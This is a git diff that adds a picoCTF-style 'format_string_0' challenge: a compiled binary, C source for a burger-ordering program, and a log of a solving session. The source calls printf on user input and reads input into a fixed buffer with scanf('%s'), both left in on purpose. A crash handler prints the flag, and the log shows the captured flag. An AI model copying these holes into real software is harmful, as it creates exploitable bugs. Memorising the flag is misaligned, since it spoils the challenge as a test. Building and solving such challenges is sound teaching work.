diff --git a/pwn/format_string_0/format-string-0 b/pwn/format_string_0/format-string-0 new file mode 100755 index 0000000..a2905df Binary files /dev/null and b/pwn/format_string_0/format-string-0 differ diff --git a/pwn/format_string_0/format-string-0.c b/pwn/format_string_0/format-string-0.c new file mode 100644 index 0000000..4fa327c --- /dev/null +++ b/pwn/format_string_0/format-string-0.c @@ -0,0 +1,101 @@ +#include +#include +#include +#include +#include +#include + +#define BUFSIZE 32 +#define FLAGSIZE 64 + +char flag[FLAGSIZE]; + +void sigsegv_handler(int sig) { + printf("\n%s\n", flag); + fflush(stdout); + exit(1); +} + +int on_menu(char *burger, char *menu[], int count) { + for (int i = 0; i < count; i++) { + if (strcmp(burger, menu[i]) == 0) + return 1; + } + return 0; +} + +void serve_patrick(); + +void serve_bob(); + + +int main(int argc, char **argv){ + FILE *f = fopen("flag.txt", "r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(flag, FLAGSIZE, f); + signal(SIGSEGV, sigsegv_handler); + + gid_t gid = getegid(); + setresgid(gid, gid, gid); + + serve_patrick(); + + return 0; +} + +void serve_patrick() { + printf("%s %s\n%s\n%s %s\n%s", + "Welcome to our newly-opened burger place Pico 'n Patty!", + "Can you help the picky customers find their favorite burger?", + "Here comes the first customer Patrick who wants a giant bite.", + "Please choose from the following burgers:", + "Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe", + "Enter your recommendation: "); + fflush(stdout); + + char choice1[BUFSIZE]; + scanf("%s", choice1); + char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"}; + if (!on_menu(choice1, menu1, 3)) { + printf("%s", "There is no such burger yet!\n"); + fflush(stdout); + } else { + int count = printf(choice1); + if (count > 2 * BUFSIZE) { + serve_bob(); + } else { + printf("%s\n%s\n", + "Patrick is still hungry!", + "Try to serve him something of larger size!"); + fflush(stdout); + } + } +} + +void serve_bob() { + printf("\n%s %s\n%s %s\n%s %s\n%s", + "Good job! Patrick is happy!", + "Now can you serve the second customer?", + "Sponge Bob wants something outrageous that would break the shop", + "(better be served quick before the shop owner kicks you out!)", + "Please choose from the following burgers:", + "Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak", + "Enter your recommendation: "); + fflush(stdout); + + char choice2[BUFSIZE]; + scanf("%s", choice2); + char *menu2[3] = {"Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak"}; + if (!on_menu(choice2, menu2, 3)) { + printf("%s", "There is no such burger yet!\n"); + fflush(stdout); + } else { + printf(choice2); + fflush(stdout); + } +} diff --git a/pwn/format_string_0/output.txt b/pwn/format_string_0/output.txt new file mode 100644 index 0000000..8cf3b6c --- /dev/null +++ b/pwn/format_string_0/output.txt @@ -0,0 +1,8 @@ +$ nc mimas.picoctf.net 60131 +Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger? +Here comes the first customer Patrick who wants a giant bite. +Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe +Enter your recommendation: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +There is no such burger yet! + +picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_ef312157}